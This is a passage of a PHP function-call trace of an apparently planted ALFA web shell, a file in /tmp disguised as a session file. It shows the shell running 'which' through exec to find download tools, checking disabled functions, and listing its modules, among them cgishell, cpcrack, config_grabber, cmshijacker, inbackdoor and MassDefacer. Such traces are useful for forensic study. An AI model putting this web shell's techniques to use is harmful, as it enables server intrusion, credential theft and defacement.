8	423	1	0.053202	438816
8	423	R			'/usr/bin/curl'
8	424	0	0.053227	438712	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/curl']
8	424	1	0.053243	438776
8	424	R			'/usr/bin/curl'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/curl'
7	421	1	0.053271	438312
7	421	R			'/usr/bin/curl'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/curl'
6	420	1	0.053302	438312
6	420	R			'/usr/bin/curl'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/curl'
5	419	1	0.053328	438232
5	419	R			13
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	++$x
5	425	0	0.053353	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	1	'get'
6	426	0	0.053367	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which get'	FALSE	FALSE	???
7	427	0	0.053382	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which get'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	428	0	0.053407	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	428	1	0.053421	438312
8	428	R			TRUE
8	429	0	0.053434	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which get'	''
8	429	1	0.054627	438416
8	429	R			''
8	430	0	0.054650	438352	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	430	1	0.054666	438416
8	430	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	427	1	0.054692	438272
7	427	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	426	1	0.054717	438272
6	426	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	425	1	0.054746	438232
5	425	R			FALSE
5	431	0	0.054760	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	1	'lwp-mirror'
6	432	0	0.054775	438280	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which lwp-mirror'	FALSE	FALSE	???
7	433	0	0.054790	438280	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which lwp-mirror'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	434	0	0.054816	438280	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	434	1	0.054829	438320
8	434	R			TRUE
8	435	0	0.054842	438304	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which lwp-mirror'	''
8	435	1	0.056053	438840
8	435	R			'/usr/bin/lwp-mirror'
8	436	0	0.056079	438728	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/lwp-mirror']
8	436	1	0.056097	438792
8	436	R			'/usr/bin/lwp-mirror'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/lwp-mirror'
7	433	1	0.056126	438328
7	433	R			'/usr/bin/lwp-mirror'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/lwp-mirror'
6	432	1	0.056153	438328
6	432	R			'/usr/bin/lwp-mirror'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/lwp-mirror'
5	431	1	0.056181	438232
5	431	R			19
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	++$x
5	437	0	0.056206	438232	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1181	1	'get_magic_quotes_gpc'
5	437	1	0.056221	438272
5	437	R			TRUE
5	438	0	0.056234	438232	get_magic_quotes_gpc	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1181	0
5	438	1	0.056247	438232
5	438	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1181	$quotes = FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1181	$magic = '<span class="header_off">OFF</span>'
5	439	0	0.056289	438232	Alfa_GetDisable_Function	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1183	0
6	440	0	0.056303	438232	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	917	1	'disable_functions'
6	440	1	0.056318	438712
6	440	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	917	$disfun = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
6	441	0	0.056381	438680	explode	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	920	2	','	'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
6	441	1	0.056410	441152
6	441	R			[0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	920	$s = [0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
6	442	0	0.056477	441080	array_unique	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	921	1	[0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
6	442	1	0.056509	442448
6	442	R			[0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	921	$s = [0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	922	$i = 0
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	925	$black_list = []
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	926	$allow_list = []
6	443	0	0.056602	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_alarm'
6	443	1	0.056615	441112
6	443	R			'pcntl_alarm'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_alarm'
6	444	0	0.056642	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_alarm'
6	444	1	0.056656	441112
6	444	R			FALSE
6	445	0	0.056670	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_fork'
6	445	1	0.056682	441112
6	445	R			'pcntl_fork'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_fork'
6	446	0	0.056707	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_fork'
6	446	1	0.056721	441112
6	446	R			FALSE
6	447	0	0.056734	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_waitpid'
6	447	1	0.056746	441112
6	447	R			'pcntl_waitpid'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_waitpid'
6	448	0	0.056771	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_waitpid'
6	448	1	0.056784	441112
6	448	R			FALSE
6	449	0	0.056797	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wait'
6	449	1	0.056809	441112
6	449	R			'pcntl_wait'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wait'
6	450	0	0.056834	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wait'
6	450	1	0.056847	441112
6	450	R			FALSE
6	451	0	0.056860	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wifexited'
6	451	1	0.056873	441112
6	451	R			'pcntl_wifexited'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wifexited'
6	452	0	0.056898	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wifexited'
6	452	1	0.056911	441112
6	452	R			FALSE
6	453	0	0.056924	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wifstopped'
6	453	1	0.056936	441112
6	453	R			'pcntl_wifstopped'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wifstopped'
6	454	0	0.056962	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wifstopped'
6	454	1	0.056979	441112
6	454	R			FALSE
6	455	0	0.056992	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wifsignaled'
6	455	1	0.057004	441112
6	455	R			'pcntl_wifsignaled'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wifsignaled'
6	456	0	0.057029	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wifsignaled'
6	456	1	0.057042	441112
6	456	R			FALSE
6	457	0	0.057055	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wifcontinued'
6	457	1	0.057068	441112
6	457	R			'pcntl_wifcontinued'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wifcontinued'
6	458	0	0.057093	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wifcontinued'
6	458	1	0.057106	441112
6	458	R			FALSE
6	459	0	0.057119	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wexitstatus'
6	459	1	0.057132	441112
6	459	R			'pcntl_wexitstatus'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wexitstatus'
6	460	0	0.057157	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wexitstatus'
6	460	1	0.057170	441112
6	460	R			FALSE
6	461	0	0.057183	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wtermsig'
6	461	1	0.057195	441112
6	461	R			'pcntl_wtermsig'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wtermsig'
6	462	0	0.057220	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wtermsig'
6	462	1	0.057233	441112
6	462	R			FALSE
6	463	0	0.057245	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_wstopsig'
6	463	1	0.057258	441112
6	463	R			'pcntl_wstopsig'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_wstopsig'
6	464	0	0.057283	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_wstopsig'
6	464	1	0.057296	441112
6	464	R			FALSE
6	465	0	0.057309	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_signal'
6	465	1	0.057321	441112
6	465	R			'pcntl_signal'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_signal'
6	466	0	0.057345	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_signal'
6	466	1	0.057358	441112
6	466	R			FALSE
6	467	0	0.057370	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_signal_get_handler'
6	467	1	0.057383	441112
6	467	R			'pcntl_signal_get_handler'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_signal_get_handler'
6	468	0	0.057409	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_signal_get_handler'
6	468	1	0.057423	441112
6	468	R			FALSE
6	469	0	0.057436	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_signal_dispatch'
6	469	1	0.057448	441112
6	469	R			'pcntl_signal_dispatch'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_signal_dispatch'
6	470	0	0.057474	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_signal_dispatch'
6	470	1	0.057487	441112
6	470	R			FALSE
6	471	0	0.057500	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_get_last_error'
6	471	1	0.057513	441112
6	471	R			'pcntl_get_last_error'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_get_last_error'
6	472	0	0.057538	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_get_last_error'
6	472	1	0.057551	441112
6	472	R			FALSE
6	473	0	0.057564	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_strerror'
6	473	1	0.057577	441112
6	473	R			'pcntl_strerror'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_strerror'
6	474	0	0.057601	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_strerror'
6	474	1	0.057616	441112
6	474	R			FALSE
6	475	0	0.057629	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_sigprocmask'
6	475	1	0.057642	441112
6	475	R			'pcntl_sigprocmask'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_sigprocmask'
6	476	0	0.057667	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_sigprocmask'
6	476	1	0.057680	441112
6	476	R			FALSE
6	477	0	0.057693	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_sigwaitinfo'
6	477	1	0.057705	441112
6	477	R			'pcntl_sigwaitinfo'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_sigwaitinfo'
6	478	0	0.057730	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_sigwaitinfo'
6	478	1	0.057743	441112
6	478	R			FALSE
6	479	0	0.057755	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_sigtimedwait'
6	479	1	0.057768	441112
6	479	R			'pcntl_sigtimedwait'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_sigtimedwait'
6	480	0	0.057793	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_sigtimedwait'
6	480	1	0.057806	441112
6	480	R			FALSE
6	481	0	0.057819	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_exec'
6	481	1	0.057831	441112
6	481	R			'pcntl_exec'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_exec'
6	482	0	0.057855	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_exec'
6	482	1	0.057868	441112
6	482	R			FALSE
6	483	0	0.057881	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_getpriority'
6	483	1	0.057893	441112
6	483	R			'pcntl_getpriority'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_getpriority'
6	484	0	0.057918	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_getpriority'
6	484	1	0.057931	441112
6	484	R			FALSE
6	485	0	0.057944	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_setpriority'
6	485	1	0.057957	441112
6	485	R			'pcntl_setpriority'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_setpriority'
6	486	0	0.057982	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_setpriority'
6	486	1	0.057994	441112
6	486	R			FALSE
6	487	0	0.058007	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	'pcntl_async_signals'
6	487	1	0.058020	441112
6	487	R			'pcntl_async_signals'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = 'pcntl_async_signals'
6	488	0	0.058044	441080	is_callable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	929	1	'pcntl_async_signals'
6	488	1	0.058057	441112
6	488	R			FALSE
6	489	0	0.058069	441080	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	1	''
6	489	1	0.058081	441112
6	489	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	928	$d = ''
5	439	1	0.058105	438232
5	439	R			'<span class="header_show_all">All Functions Accessible</span>'
5	490	0	0.058127	440024	getenv	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1193	1	'SERVER_SOFTWARE'
5	490	1	0.058145	440104
5	490	R			'Apache/2.4.52 (Ubuntu)'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'proc'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'phpeval'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'sql'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'dumper'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'coldumper'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'hash'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'connect'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'zoneh'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'dos'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'safe'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'cgishell'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'ssiShell'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'cpcrack'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'portscanner'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'basedir'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'mail'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'ziper'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'deziper'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'IndexChanger'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'pwchanger'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'ShellInjectors'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'php2xml'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'cloudflare'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'Whmcs'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'symlink'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'MassDefacer'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'Crackers'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'searcher'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'config_grabber'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'fakepage'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'archive_manager'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'cmshijacker'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'remotedl'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'inbackdoor'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'whois'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1216	$key = 'selfrm'
4	65	1	0.058976	434736
4	491	0	0.058985	434736	AlfaNum	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2561	7	8	9	10	7	6	5	4
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	949	$alfax = []
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	950	$find = []
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	$i = 1
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 1
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 2
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 3
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 4
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 5
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 6
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 7
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 8
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 9
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	952	$alfax[] = 10
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	951	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	955	$find[] = 8
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	955	$find[] = 9
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	955	$find[] = 10
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	955	$find[] = 7
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	955	$find[] = 6
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	955	$find[] = 5
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	955	$find[] = 4
5	492	0	0.059270	436184	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	1	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	492	1	0.059288	436256
5	492	R			FALSE
5	493	0	0.059303	436184	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	2	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	493	1	0.059319	436256
5	493	R			FALSE
